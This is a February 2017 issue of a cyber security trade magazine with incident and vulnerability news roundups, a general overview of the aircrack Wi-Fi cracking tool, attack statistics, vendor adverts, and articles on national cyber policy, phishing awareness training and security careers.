Cyber world new version

Page 1

Hello. Welcome to the February 2017 edition of Cyber World - the monthly magazine that brings you the latest news in the world of cyber security. We bring you analyses from leading industry professionals, academics and rising stars in the industry, together with a roundup of the latest industry news, latest vulnerabilities and threat intelligence. In this edition, we are proud to present a special guest contribution by DarkMatter founder and CEO, Mr Faisal Al Bannai. We are also excited to publish analyses by Daryl Flack, co-founder and CIO of Blockphish and security lead for the Smart Metering Implementation Programme at the Department for Business, Energy and Industrial Strategy (BEIS). We also have an article by Kevin Murphy, a cyber Security, risk and privacy specialist at the Royal Bank of Scotland and president of the ISACA Scottish Chapter, and by Talal Rajab, the Head of Programme at techUK for Cyber and National Security. This edition also includes an analysis on ‘IoT - Security Issues in Factory Automation and Control’ as well as an interview with the Rising Star Siming Wei, a Cyber Security senior associate at PwC. As always, we thank all our readers for their interest and valuable feedback, and we look forward to your continuous engagement with our magazine. If you enjoy this magazine, feel free to share it with your friends and colleagues, and your feedback is always welcome.

Laith Gharib Managing Director


Major Incidents Rounding up the news

Siblings Arrested Over Italian Elites’ Hack

Hackers Seize Exposed MongoDB Databases

Police have arrested a brother and sister in Italy who are suspected of having targeted the communications of former Italian PM Matteo Renzi, former PM Mario Monti, Mario Draghi, the head of the European Central Bank, a cardinal and many other VIPs.

MongoDB is a so-called big data, unstructured database. It is popular with JavaScript programmers because you interact with it in JavaScript, and it stores records in JSON (JavaScript Object Notation) format. The problem with it is that the default installation does not set any kind of authentication.

The pair was caught when they sent a phishing email to a security researcher who turned it over to the police.

Researcher Niall Merrigan has now reported that hackers have seized 28,000 of these and held them for ransom. Hackers find these open databases using portscan and a programme called Shodan. They delete all the data but insert one record providing an email address where the victims can send payment to in order to get their data back.

The Guardian reports that the hackers stole financial information and then used it ‘in order to make financial gains’, presumably in the financial markets, since there is no evidence of blackmail or of them having sold this data.

3

C Y BER WORLD


UK Healthcare System Comes Under Attack

Encoded HTML Phishing Attack on Netflix

Last October the Northern Lincolnshire and Goole NHS (National Health Service) Foundation Trust was infected with the Globe2 ransomware. Hundreds of operations and appointments had to be cancelled. The hospitals simply shut down their computers while figuring out what to do. An audit showed that many hospitals are still using Microsoft Windows XP, which is no longer supported. Barts Health NHS Trust in London, the largest in the UK, has reportedly also suffered a ransomware attack on 13th January, and has taken several drives offline as a precaution. In an official statement, however, the Trust has denied that the IT problems it experienced resulted from a ransomware attack.

FireEye reports that hackers have used phishing attacks to steal Netflix customers’ payment information. The mechanism seeks to avoid text-based detection by sending the web page as an encoded and encrypted payload. When the web page opens, JavaScript renders the page in the browser. The hacker also sought to avoid being blacklisted by generating an error 404 message when the page was loaded after clicking a link in certain large sites, including google.com. The user is attacked by way of a phishing email asking them to update their Netflix information.

FEBRUA RY 2 017

4


Ukraine Power Grid Attacked Again The power grid in the Ukraine, which had already been attacked in 2015, was attacked again in December 2016. The latest attack resulted in a power cut in the country’s capital Kiev in the night of the 17th of December, taking out roughly ⅕ of the city’s power. The 2015 attack was blamed on Russia, according to the BBC, and the security firm hired to investigate the latest incident, ISSP, says the two hacks are related.

Yahoo Hack Impacts Merger The news has spread across the globe that hackers stole 1 billion user accounts from Yahoo. Regulators at the SEC (Security and Exchange Commission) now want to know why Yahoo kept that information secret. Questions have been raised whether this failure has had anything to do with Yahoo’s merger with Verizon. News reports claim that as a result, Verizon wants to lower the purchase price by $1 billion.

San Francisco Train System Hacked Hackers managed to attack the machines that dispense tickets in the San Francisco subway. They changed the display to read “You Hacked, ALL Data Encrypted”. Fortune magazine wrote to the email address provided by the hackers. The hackers replied that the transportation agency is using equipment as old as Windows 2000, and so was an easy target. They stole 30GB of accounting, payroll, email, and other data.

5

C Y BER WORLD


“

The news has spread all over the world that hackers stole one billion user accounts from Yahoo.

FEBRUA RY 2 017

6


Vulnerabilities Latest Developments and Trends

Deeper Dive — Aircracking Deeper Dive looks at an attack vector or vulnerability and seeks to better understand how hackers operate and what are the best practices. The topic of this edition is Aircracking the wireless network hacking tool whose development started in 2006. The aircrack toolkits’ main application is to find the passphrase used for networks. This can be divided into two categories, WEP and WPA/WPA2. To crack WEP networks, aircrack collects lots of initialisation vectors; the number required depends on the length of the password being cracked. It is estimated that 20,000 packets are required for a 64 bit passphrase and up to 85,000 packets for a 128 bit passphrase.

7

The other networks aircrack commonly breaches are WPA/WPA2. It does so using a brute force dictionary attack. Here you can find some example wordlist, most containing several million words each. This means the password will only be cracked if it is in the wordlist. Many tutorials can be found online for how to test a network with aircrack and ensure it is not vulnerable to an attack. The official website (aircrack-ng.org) also provides plenty of documentation and walkthroughs to help use the product. Protecting wireless networks is paramount to any organisation or individual as this is the gateway to all our personal information stored on the web.

C Y BER WORLD


Eir Modem used by Irish ISP Open to Attack

Researchers Hack Samsung Camera

In November, a writer known only as kenzo2017 found what he calls a ‘serious bug’ with more Eir modems, bringing the number that can be hacked to three. The issue is that a hacker can use the TR-069 protocol to change the modem settings.

In 2014, researchers at the DEFCON conference demonstrated how to take over a Samsung camera. Samsung’s response was to remove the web interface rather than to fix it. That spurred a hacker group, Exploitee.rs, to ‘take another crack at it,’ writes Threat Post.

The TR-069 protocol is used by ISPs to reset passwords and make other changes when customers call support. One problem with the model is the LAN. The internal-facing side of the modem is incorrectly exposed to the public internet when the hacker resets the device.

Exploitee.rs is not a secretive group. It lists dozens of devices on its website and publishes code showing how to hack each. The exploit is pushed to the device using CURL, adding instructions to tell the code that updates the firmware to append the hacker’s own instructions to end.

FEBRUA RY 2 017

8


iTunes and App Store Vulnerable to Malware Vulnerability Lab showed that a user can enter JavaScript into the iTunes screen where users sign up to receive notification of a new app. The field is supported to be static, but a coding error causes the value entered there to be evaluated as a command. The Notification function lets a hacker spoof the email address. So the hacker can sign up for notification and use Apple to send its phishing malware to an Apple user.

FTC Files Injunction against D-Link The FTC filed a Complaint for Permanent Injunction and Other Equitable Relief against D-Link Corporation, maker of routers and IP cameras. The complaint says, ‘defendants have failed to take reasonable steps to protect their routers and IP cameras from widely known and reasonably foreseeable risks of unauthorized access…’ This includes ‘hard-coded user credentials and other backdoors and command injection flaws…’ The FTC also chastises them for storing passwords in clear text. The targeted devices are N300 Router, N Dual Band Router, and N Network Cameras.

New Malware Threatens Mac and Linux Fruitfly, aka Quimitchin, is a newly discovered ‘old’ malware that targets Linux and Mac systems. It is targeted at Mac, but also works on Linux, since Mac shares some Linux functions. Malwarebytes uncovered this issue when they noticed an infected machine making connection to different IP addresses. The computer was sending out screen prints. They do not know how long the code had been on the machine, but speculate it could have been there for some years. One reason for that is the coding techniques show a limited understanding of Mac and some aged design principles. Apple has released a fix.

9

C Y BER WORLD


“

Researchers at the DEFCON conference demonstrated how to take over a Samsung camera

FEBRUA RY 2 017

10


Monthly Analysis November-December Threat Roundup

Global Distribution of Attacks November and December saw an increase in attacks, 74 and 103 attacks respectively, from previous months. This could be due to the Christmas vacation giving hackers more time to seek out targets. The US only represents 38% of attacks over the two month period, which shows the attacks were more widely distributed to other parts of the world, as seen for example in the increase in the attacks in India.

US

UK India

Global Israel

Ecuador

Global Distribution of Attacks

Middle East

11

International

Asia Pacific

C Y BER WORLD

Europe

North America


Attack Timeline The graph to the right represents the 61 days in the two month period, with the usual ups and downs, especially from the beginning to mid November. There was also a slight spike in activity the week before Christmas, followed by a sharp dip on the 22nd of December.

November-December

Top Sectors Targeted The Government sector experienced nearly double the breaches than the second most targeted sector — Online Services — with 37 attacks. There was a significant increase in the attacks in the ‘Other’ sectors category which includes a large number of universities that were attacked. The remaining categories, Healthcare, Finance, and Single Individuals experienced 23, 18 and 6 incidents respectively.

FEBRUA RY 2 017

12


Most Used Attack Vectors

Credentials (Exponential Scale Used)

The pie chart shows a relatively even distribution of the attacks across the different attack vectors. Account Hijacking was the most prominent known vector, which could be a result of the OurMine Twitter account hijackings that occurred. There was also a significant increase in DDos attacks with services like Steam and Tumblr suffering outages for several hours. SQLi makes a strong return, having been absent in our December edition’s analysis.

13

25%

16% 13%

15%

11% 10% 10%

Credentials Stolen In three days alone, over 100 Million credentials were leaked. It is interesting to note that when comparing the timeline with the credentials stolen, there appears to be no correlation. This suggests that these large credential breaches are the result of only one attack. November-December

C Y BER WORLD



VisDa

Take control of your data A revolutionary complete track and trace tool that visualises and analyses data transfers to understand what, how and where information is moving to achieve regulatory compliance. Key Features: GDPR transfers compliance score Instantly identify high risk communications All files transferred across a network are stored and recorded All content is fully text indexed, so information can easily be accessed Scalable, our solution is proven on networks that operate up to 1Tb/s

www.secgate.co.uk/visda



Special Guest

Faisal Al Bannai

17

C Y BER WORLD


Making the Case for a Ministerial Cyber Security Appointment About the Author: Faisal Al Bannai is Founder and Chief Executive Officer of DarkMatter, an international cyber security company based in the UAE, which is empowering digitisation globally.

In February 2016, President Obama established the

3. Prepare consumers to thrive in a digital age.

Commission on Enhancing National Cyber Security

4. Build cyber security workforce capabilities.

with an Executive Order. The Commission completed

5. Better equip government to function effectively

its report on December 1, 2016, providing detailed short-term

and

long-term

recommendations

to

strengthen cyber security in both the public and private sectors, while protecting privacy, fostering innovation and ensuring economic and national security. The report emphasises the need for partnerships between the public and private sectors, as well as international engagement. It also discusses the role consumers must play in enhancing the US’ digital security. The report categorises its recommendations within six overarching imperatives focused on infrastructure,

investment,

consumer

education,

and securely in the digital age. 6. Ensure an open, fair, competitive, and secure global digital economy.

The report emphasises the need for partnerships between the public and private sectors...

The Commission’s recommendations are not binding, though it would be prudent to at least consider the

workforce capabilities, government operations and

report’s references and overviews given the broad

requirements for a fair and open global digital economy.

base of expertise drawn on in the preparation of the

The six imperatives are:

document, including consultation with technical and policy experts, input from the public through open

1. Protect, defend, and secure today’s information infrastructure and digital networks.

hearings and a request for information, and reviewed existing literature.

2. Innovate and accelerate investment for the security and growth of digital networks and the

The heightened level of cyber threat on a national

digital economy.

level is not just a US phenomenon but a trend that

FEBRUA RY 2 017

18


is growing across the globe, and it is high time cyber security is reflected within every government ministry and agency as a core function, with a direct reporting line to senior officials clearly defined and implemented. The importance of securing digital infrastructure has become as important to a nation’s continued development as its choice of domestic or foreign policy, and in many ways cyber security spans both of these important areas given the rise in threats emanating from within countries and those being faced from abroad. The six imperatives included in the Enhancing National Cyber Security report offer a strong framework for any progressive nation anywhere in the world to consider its cyber security posture and to take pro-active measures to improve its defences given the uncertain nature of threat actors, be they nation states or hacktivists, common criminals or other unknown adversaries. It is telling that the first imperative in the report relates to, “protecting, defending, and securing today’s information infrastructure and digital networks” as a guiding requirement, given we believe this is the key factor in creating a trusted and sustainable digital environment in which all participants have confidence to invest in and prosper from. This imperative is aligned to the Cyber Security Life-Cycle, which advises the planning, detection, protection, and recovery of digital assets in order to mitigate against the threat of a cyber incident. A holistic, end-to-end approach to cyber security is the most effective way to counter the ever-expanding cyber threat landscape, as it is clear that preventing or avoiding every cyber incident is just not possible.

19

C Y BER WORLD


“

The heightened level of cyber threat on a national level is not just a US phenomenon but a trend that is growing across the globe...

FEBRUA RY 2 017

20


Third Party Risk Management. Do you: rely on third parties to deliver services to clients? trust third parties with your company’s confidential data? integrate networks, systems or applications with third party solutions? assess your suppliers for their criticality?

We will: build you an operating model to identify and reduce third party risk. Implement an end to end third party risk management process within your business. manage and deliver your third party assurance programme. support your supplier criticality assessments.

Get in touch for a free consultation info@secgate.co.uk



IoT — Security Issues in Factory Automation and Control

An IoT DDOS attack against DYN.com in October used factory automation equipment to take down Netflix, Twitter, Amazon, and other high profile sites in large sections of the USA for several hours. DYN.com is a CDN (content distribution network) responsible for caching and replicating content around the world. Hackers used the default user ID and password built into IP cameras to create a botnet. This open IoT component was a large security hole that not many people had thought about before. Cyber defences are traditionally focused on hardening the IT systems in the plant, and not the factory automation devices themselves.

23

Here we look at that exploit, and more generally at the nature of IoT in the factory. FACTORY AUTOMATION There are two sides to IoT in the factory: Factory automation and the sensor-driven IP operating across wired and wireless networks. The second is what we usually think of when we write about IoT. But if you talk to engineers who programme PLC devices, they will tell you that they have been doing IoT for decades. The only thing new is the name assigned to it.

C Y BER WORLD


True. Yet the difference is that today there is the cloud, big data databases, and analytics. But programming a serial or ethernet PLC device to control a lathe, welding machine, or painting machine is still an old-fashioned ordeal of programming ladder logic using desktop PC software like RSLogix for the Allen Bradley serial PLC devices. This kind of tedious programming has nothing to do with writing web services or otherwise using a full-featured programming language. Instead, the PLC programmer writes memory address information using the designation ‘file’, which is a file location and offset. The offset is the length of the data element. In the DF1 industrial protocol, the offset is the length of a single field, where the offset from the file’s initial location is

the size of the element and element number. That size is given in hexadecimal, decimal, or octet notation. The values are written as a string of single values. These are simple commands like start, stop, change baud rate, rotate, etc. that together describe a complete industrial process. Industrial network routers convert this serial (or ethernet) data to send to other serial or ethernet devices, and the management cloud. So it is difficult to imagine a hacker hacking that, since they are focused on PC hardware and network devices. Yet, attacking PLC devices is exactly what the

FEBRUA RY 2 017

24


American spy agencies allegedly did in 2010. They are said to have attacked Siemens PLC controllers that ran the centrifuges in Iranian nuclear fuel enrichment facilities. The Stuxnet worm was introduced by a phishing attack on Windows PCs. That attack caused the centrifuges to spin out of control and break. That wildly effective, daring operation dealt a huge blow to Iran’s nuclear programme. SENSOR-DRIVEN IOT The other side of IoT is sensors deployed for preventive maintenance, predictive models, measuring uptime, and gathering data to make changes to the line. That is done by adding assembly and subassembly stations, adding shift operators, improving training, and shifting material flow. Acoustic sensors ping devices and measure resonance to test the quality of materials and the completed 25

product. They use transducers to convert mechanical to electrical energy to check vibration. Increased vibration indicates when a machine needs new filters, maintenance, or calibration. Plants count items with cameras to measure operator and station productivity. They check emissions, temperature, humidity, ambient light, etc. All of this data is used to operate the plant in real time and fine tune the factory floor through offline, after the factor analysis, and make changes to the assembly line, using planning software designed for that. IP CAMERA EXPLOIT The October attack was caused by an IoT device that its Chinese manufacturer has since replaced. Hackers planted the Mirai DDOS malware in IP cameras and DVR recorders made by XiongMai Technologies,

C Y BER WORLD


and unleashed up to 1.4 TBPS DNS traffic to the DYN. com cloud. That caused more traffic than the servers could respond too, thus taking them offline. IP (internet protocol) cameras are obviously connected to the internet, so there is no need to attack them at any wireless industrial or wired non-Ethernet protocol, as would be the case with an industrial controller. And the camera’s IP network is what let hackers discover their location in the first place. The hackers planted the malware easily because the devices had the default userid and password. The password was hard-coded into the firmware. The hackers could log in with telnet and ssh. In the write-up analyzing the attack, DYN.com made clear what the problem is when they wrote: “During a

DDoS which uses the DNS protocol it can be difficult to distinguish legitimate traffic from attack traffic.” Despite their efforts to surge bandwidth and shape traffic, two successive waves of attacks overwhelmed their systems for several hours. The source code for Mirai is freely available on the internet. So the hackers did not write anything new. One part of the attack came from the Mirai command and control center, showing perhaps an increased level of sophistication that warrants further analysis. This botnet was also released on the security blog Krebs and the French ISP and hosting company OVH earlier last year. Different parties have claimed responsibility, although no group has of yet been confirmed as the actual culprit. The consensus is this was not state-sponsored.

FEBRUA RY 2 017

26


Forest Tree The most advanced cyber security solution Forest Tree is a patented advanced Cyber Security solution that allows organisations to monitor and understand the content and context of each electronic communication channel, from documents leaving the organisation, malicious traffic, to user behaviour. The captured network information is processed and systematically analysed in order to extract all the information and metadata contained in the communication channels.

High performance: 1 Tb/s Unique: Patented technology Highly scalable: Big data storage Proactive: Block advanced threats Intelligent: In-depth analysis Low Maintenance: Purpose built

A single platform solution:

Network Forensics Anomaly Detection Security Analytics User Profiling Machine Learning


We detect advanced threats in seconds and neutralise them in milliseconds www.foresttree.co.uk A defence-grade cyber security product built for the Enterprise, Government and SME marketplaces. Our partner’s ground-breaking monitoring technology – built and improved over 20 years of securing the world’s most sensitive government and commercial information – protects you against the most sophisticated and advanced cyber threats. This coupled with an enhanced Artificial Intelligence engine allows Forest Tree to learn and become an increasingly more effective and efficient tool. The modular approach taken during the development of the Forest Tree solution ensures clients have high levels of personalisation available.


How to Tackle the Human Aspects of Cyber Security Daryl Flack

About the Author: Daryl Flack is Co-founder and CIO of Blockphish and Security Lead for the Smart Metering Implementation Programme at the Department for Business, Energy and Industrial Strategy (BEIS). Previously, he was CIO of AXELOS, a joint venture between Capita Plc and the Cabinet Office. Not a day goes by without another cyber breach

to reduce the frequency and volume of cyber breaches

hitting the news. Recently, we’ve seen breaches impact

and the impact they have, then we are going to need to

corporations, individuals and our political systems:

do more to tackle the human aspect of cyber security. The causes of these incidents may all be different,

• • •

€53 million stolen from an aerospace parts

however, analysis shows that human actions are

manufacturer via a phishing scam;

overwhelmingly at the heart of the vulnerabilities, and

The US elections potentially influenced following

that attackers are actively seeking to exploit our human

a hack on the Democratic National Committee;

weaknesses to compromise target systems. Often,

1.5 billion individual’s data stolen from Yahoo in

this is through an employee being tricked using social

two enormous breaches.

engineering. For example, up to 91% of cyber-attacks begin with a phishing or spear phishing email. If we can

29

As the number of cyber-attacks increases, so does the

reduce our susceptibility to these attack methods, it

potential negative impact to every one of us. If we are

will significantly improve our cyber security.

C Y BER WORLD


The act of phishing is aimed at trying to solicit a

If the subject matter is compelling enough, it can be hard

response from a person or group of people via mediums

to resist the urge to carry out the attacker’s request.

such as:

Susceptible as we may be to our emotional responses,

Email

all is not lost. We are adept at assessing and

Text (also known as ‘smishing’)

understanding potential threats or risks. However,

Phone calls / voicemails (also known as ‘vishing’)

how people perceive threats can be subjective based

Social media, or

on their personal circumstances and the relevance of

A combination of some or all the above.

a threat to them. If we don’t appreciate the likelihood of a threat happening, then we’re less likely to adjust

The reason why this form of attack is so successful

our behaviour. This is one of the challenges of tackling

is because the structure and content of these

threats such as phishing: We don’t see a simple

communications are specifically designed to prey

everyday task such as opening and responding to

on basic human behaviours that we all exhibit. They

emails as being a threat.

borrow from the same techniques that people have used for centuries to try and influence others, either

To address this, there needs to be a greater

consciously or unconsciously.

understanding of what the threat is, how it could affect

Some examples of the techniques include: • • • •

An urgent request Instruction from someone in authority Curiosity Appealing to your compassion

us or the company, how we can help to stop it, and most importantly to feel like we have an active part to play. It’s this feeling of responsibility, i.e. an emotional response that decides whether staff is an active part of your cyber defences or rather part of the vulnerability. Once you have that basic principle instilled, how do FEBRUA RY 2 017

30


you ensure you have the right awareness programme in place to affect real changes to your staff’s behaviours? There are some basic principles that can be used to help in this regard. MEASURABLE •

Whatever learning you provide needs to be measurable so you can identify what works and

“ •

what doesn’t. Be willing to take on feedback from your staff and change your approach accordingly. •

This is also where ethical phishing campaigns, if tailored to suit your organisation and carried out correctly can have a huge benefit.

31

C Y BER WORLD

If we don’t appreciate the likelihood of a threat happening, then we’re less likely to adjust our behaviour.

By sending staff an initial ethical phishing email to attain a baseline at the outset, you can then follow up regularly with both ‘all staff’ campaigns and specific teams (spear Phishing) or individuals (Whaling) based on the risks you face. This will provide you with insights into the effectiveness of your training.


ADAPTIVE, PERSONALISED AND APPROPRIATE

REGULAR AND CONCISE •

Delivering a 1 hour session once a year won’t

The content should use understandable language

have a positive impact, or change behaviours

and be relevant to the audience. People won’t

for the better. The awareness learning content

engage in the learning if they don’t understand

should be delivered in short modules of ideally

how the concept or the scenarios it is portraying

1-2 minutes but less than 10 minutes.

are relevant to them or their role.

Small nuggets of information that people can

The learning should be tailored based on staff

consume frequently without it affecting their

role, knowledge and skill levels. Consider short

productivity but will allow them to internalise

quizzes prior to assigning learning content for

the key messages.

staff to complete. This will enable you and the staff to see if they already have the requisite

FEBRUA RY 2 017

32


knowledge in one area and allow them to focus their learning on areas in which they are less proficient. UTILISE DIFFERENT LEARNING FORMATS •

Different people learn in different ways and at different speeds. This needs to be allowed for with different content types and delivery methods to provide accelerated learning.

Consider content such as videos, animations, games, simulations blended with traditional Learning.

Blend electronic learning with physical delivery mediums and communications such as lunch and learns, posters and other rich graphical content identifying the highest risks and threats. Specific breakout sessions with guest speakers work well too. The subject areas here can cover non-corporate areas of focus such as securing your Facebook profile or guidance around online shopping. By making some aspects of the subjects relevant to people in their personal lives, they’ll be more likely to adopt those good behaviours in their corporate lives.

TRY TO MAKE IT ENGAGING, COMPETITIVE AND ENJOYABLE •

This is where the real behaviour changes can happen because if people enjoy something, they’re much more likely to remember it.

Consider using incentives and rewards. This can be anything from utilising points and leader boards to encourage competition to providing a sense of achievement or status. Recognition via benefits can be used too, such as small pay awards for those with the budget although nonfinancial incentives such additional annual leave or specific mentions on their annual appraisals can work just as well.

A good approach is to start out in a single risk area such

33

C Y BER WORLD


“

By making some aspects of the subjects relevant to people in their personal lives, they’ll be more likely to adopt those good behaviours in their corporate lives.

FEBRUA RY 2 017

34


as phishing and grow it over time to include other areas

Be vigilant in spotting attempted attacks.

such as password security, social media, information

Be diligent in reporting anything suspicious.

handling and other relevant subjects. Technology will always be the first line of defence and Ultimately, your staff can be one of your strongest

is incredibly valuable in protecting your organisation

defences against cyber-attacks. However, for you to

but there will be times when the attackers get through.

make the most of this potential, your staff will need to:

Then your staff are your last line of defence. Only once you have a cyber aware workforce with a security

• •

Feel it’s their responsibility to understand the

culture embedded within your organisation, can you

threats and protect the company.

be confident in your ability to be resilient to the cyber

Feel confident they’ve had the necessary training

threats you face.

to know what to look for in a potential attack.

35

C Y BER WORLD



Key Cyber Security Skills in the Digital Age Kevin Murphy

37

C Y BER WORLD


About the Author: Kevin Murphy (CISM, CISSP, CESP, CEH, ISO27001) is a Cyber Security, Risk and Privacy Specialist at the Royal Bank of Scotland and president of the ISACA Scottish Chapter. He has more than 25 years of experience in enterprise IT processes and systems experience serving all service line clients in IT strategy, architectures, IT planning and project management, IT effectiveness and process improvements, systems lifecycles, and operations. A former police officer, Murphy received a Chief Constables commendation for a career which included front line policing, e-crime and drug enforcement. Moving into consultancy, Murphy was quickly nominated by the prestigious SC Magazine as one of the top emerging cyber security professionals in Europe.

In the past five years, we have seen the decline

fit to the business model or culture. The control

of ‘Information Protection’ and the rise of ‘Cyber

environment should be shaped by the business context.

Security’; the terms ‘Digital Age’ and ‘Internet of Things’

The key business drivers will affect the decision-making

firmly established in our professional lexicon; the

process, inform the overall culture and translate into a

continued evolution of the cloud; and the immediate

risk appetite which will determine what controls are

spectre of quantum computing as the next great

invested in and applied. How does the cyber security

technological advancement.

professional obtain this perspective? It is clear that a mix of academic and experiential learning is a great

By any measure, the cyber security professional

approach. Firstly, no matter what industry you operate

is working within a whirlwind of change; the only

in, there will likely be introductory qualifications you

true constant being humans (for now!) acting as the

can take to gain a better understanding of the business.

initiators of this change. The question can therefore be

For example, the ‘Professional Banker Certificate’

asked: What skills does the cyber security professional

offered by the Chartered Banker Institute is a great

require to remain relevant in the workplace? Three core

introduction to the core concepts of banking. There

skills are required for a successful career now and for

are no entry requirements for the qualification and

the foreseeable future.

it generally requires only a few weeks of self-study. Gaining a professional qualification also has the benefit

KNOW YOUR BUSINESS

of demonstrating both your commitment to your business environment and increasing your credibility

A first requirement is an understanding of the business

with stakeholders when engaged in debate.

for which cyber professionals are responsible. Whether this be banking, pharmaceuticals or oil and gas, cyber

Business credibility can help gain access to the

security professionals cannot be truly effective by

second key area in developing business knowledge –

simply overlaying generic controls in their environment

experiential learning. Though many of us may view our

to protect the information for which they are

audit colleagues with trepidation, it remains one of the

responsible. This will inevitably lead to gaps and

best areas in an organisation to gain an insight into the

inconsistencies, as some solutions will not be a natural

business and develop business knowledge.

FEBRUA RY 2 017

38


Any cyber security professional would benefit from

aspects when documenting a business case and

a secondment or shadowing opportunity within an

detailing the return on investment should a particular

audit function. Primarily, audit will provide exposure

security solution be advanced. Other areas of note

to a range of issues facing the organisation, thereby

include Human Resources and Marketing to understand

offering the cyber security professional a holistic view

how personal information is handled and secured. In

when providing control assessments and solutions.

sum, the cyber security professional should maintain a

Secondly, any professional would benefit from audit

healthy interest in all business functions to ensure an

experience – developing a cogent writing style,

effective understanding of the information lifecycle.

applying an investigative methodology, presenting fact-based conclusions, and the experience of having

KNOW THE RISKS

difficult conversations with positive outcomes are all The second requirement to remain effective in the

valuable skills gained by the audit professional.

workplace is for the cyber security professional to The cyber security professional should not limit his or

maintain a base level of subject matter expertise.

her experience to audit. Key skills can also be obtained

The diverging and increasingly sophisticated forms

by working in the risk function, thereby understanding

of technology, ranging from cloud to quantum

the concepts of key risk indicators, performance

computing, will make it increasingly difficult for the

indicators and risk appetite statements – all important

cyber security professional to specialise in more than

39

C Y BER WORLD


one discipline. Their role will therefore evolve into

understanding of the data lifecycle in an organisation

becoming an informed interface between technology

is fundamental to the role of the cyber security

and business stakeholders.

professional. ‘Privacy’ can no longer be seen as distinct from cyber security, since a key tenet of the legislation

To be effective in this ‘nexus’ function, the cyber security

is how the confidentiality, integrity and availability of

professional will require a common denominator of

personal information are maintained.

subject matter expertise. The globally recognized qualifications offered by ISACA are a good step in this

So, what are the risks in the foreseeable future? It

direction, particularly the CSX Practitioner, CISM and

is likely that with the onset of quantum computing,

CRISC designations. But what defines a ‘base level

the cyber security professional shall require a

of expertise’? The cyber security professional should

more detailed understanding of cryptography as

consistently review the risk landscape and challenge

organisations transfer from classical computing to a

whether they have the expertise to provide informed

medium where many current forms of encryption are

comment on the threats an organisation faces. For

obsolete. The cyber security professional will have

example, in the previous decade, the ability to counter

a key role in managing this transition and interfacing

fraud through money laundering was a major area of

with technology providers, business stakeholders, the

focus for the regulator. Now, it can be argued that

privacy team, legal department and more.

with the EU General Data Protection Regulation an FEBRUA RY 2 017

40


KNOW YOURSELF What will enhance the cyber security professional’s ability to interface with such a diverse range of stakeholders on a myriad of subjects? Excellent interpersonal skills will clearly be a premium. How quickly can you synthesise many sources of information, then deliver this effectively in one paragraph or a fiveminute pitch to the executive? To ensure these skills remain effective, the cyber security professional has a responsibility to be objective in assessing his or her abilities and should consistently strive to improve. This development can be aided by employing the help of a more experienced mentor. Thankfully, many professional organisations now offer mentoring as part of their training environment. When development areas have been identified, the next step is to build these into an action plan with set goals and timeframes. Key to this process is the ability to practice these skills in a safe environment. For example, if you are nervous about an upcoming presentation to the board, practice first in front of your colleagues and slowly build that experience in a constructive environment. Also, volunteer for activities which use the skills you need to acquire as you will quickly develop confidence with practice. If these activities cannot be found in your organisation, ISACA has a designated area of the website where many opportunities can be found — opportunities range from the development of academic programs to organising the next international conference. Finally, the ability to travel and work in different jurisdictions should not be understated. Drawing on our earlier discussion regarding business culture and linkage to risk appetites, the opportunity to work in different parts of the world can provide an invaluable experience in broadening both your interpersonal skills in how you interact with others and providing different approaches to common problems.

41

C Y BER WORLD


FEBRUA RY 2 017

42


THE TAKEAWAY The role of the cyber security professional is unique:

Presented like this, the cyber security profession can

What other position requires conversations with so

be exciting and daunting in equal measure. To help

many other areas of the organisation?

navigate these challenges effectively, professionals must understand their business and know the risk

What profession encompasses such a range of topics

environment to the extent they can provide an informed

from adequate fencing to cryptographic algorithms?

opinion. Ultimately the cyber security professional is a

Or skills that include presenting to an audience of 100

leader who should role model the values of continual

people and providing a one-paragraph summary for a

improvement, be solution-orientated, always act in

press release?

the best interests of the organisation, and help any colleague who requires assistance.

43

C Y BER WORLD



Expert Opinion Talal Rajab

45

C Y BER WORLD


A techUK Analysis of the UK Government’s National Cyber Security Strategy About the Author: Talal Rajab is the Head of Programme for techUK’s Cyber and National Security programmes. He manages strategic relationships between Government and industry members on cyber and national security related issues, in particular through the Cyber Growth Partnership. He also leads techUK’s work on the Investigatory Powers Bill. He has a parliamentary background having joined techUK from the Industry and Parliament Trust (IPT), where he managed the IPT’s business relations and led on the Trust’s Cyber Security Commission.

On Tuesday 1st of November, the UK Government announced the publication of its National Cyber Security Strategy. Underpinned with a £1.9bn investment, it sets out how the UK will use automated defences to defend citizens and businesses against growing cyber threats, support the UK’s growing cyber security industry, develop a world-class cyber workforce and deter cyber-attacks from criminals and hostile actors. The Government would be the first to admit that past policies on cyber security have not achieved the scale and pace of change required to stay ahead of the ever changing cyber threat. For many digital services and products emerging on the market today security has been an afterthought. Too many organisations are suffering basic breaches, too few investors are willing to risk supporting entrepreneurs in the sector and there is a lack of graduates and others with the right skills emerging from the education and training system. To address these failures, the new £19.bn Strategy will therefore focus on three key themes:

DEFEND: This strand of the Strategy, focusing primarily on the UK’s critical national infrastructure, aims to ensure that the UK has the means to defend itself against evolving cyber threats, to respond effectively to incidents and to ensure UK networks, data and systems are protected and resilient. In this regard, the new National Cyber Security Centre (NCSC) will provide leadership to industry on key national cyber security issues, and work with the Ministry of Defence’s (MoD) Cyber to help the Armed Forces respond to a potential, significant national cyber attack through active cyber defence (ACD) measures. The ‘Defend’ strand of the Strategy will also focus on ensuring that all government digital services built or procured have security ‘built in by design’, working closely with the Government Digital Service (GDS), the Crown Commercial Service (CCS) as well as NHS Digital in order to implement new data security standards. This is an area that techUK will look at increasingly in 2017,

FEBRUA RY 2 017

46


ensuring that the Government’s digital transformation agenda is underpinned with security. DETER: The ‘Deter’ strand of the Strategy will be led by the intelligence agencies, the Ministry of Defence, law enforcement and the National Crime Agency, in coordination with international partner agencies. It will see the Government investing in detecting, understanding, investigating and disrupting hostile actions taken against businesses and the public sector, pursuing and prosecuting cyber criminals whilst reserving the right to take offensive action in cyberspace. One of the main objectives of this strand of the Strategy is to reduce cybercrime. Law enforcement 47

has traditionally been underfunded in this regard, as highlighted by techUK’s recent ‘Partners Against Crime’ report, so it is good to see a commitment to enhancing law enforcement’s capabilities and skills at a national and local level, as well as establishing a new reporting system in order to share information across law enforcement in real time. Interestingly, the strategy recognises the importance of encryption to the protection of the UK’s most sensitive information and stresses that the UK will continue to maintain its sovereign capability in this area, whilst working with industry to ensure that there are no ‘safe spaces for…criminals to operate beyond the reach of the law’.

C Y BER WORLD


DEVELOP: This strand of the Strategy will focus on growing the UK’s cyber security industry, investing in accelerator programmes, scientific research and skills. As part of this, the Strategy highlights the creation of two new cyber innovation centres to drive the development of cutting-edge cyber products and dynamic new cyber security companies as well as allocating a proportion of the £165m Defence and Cyber Innovation Fund to support innovative procurement in defence and security.

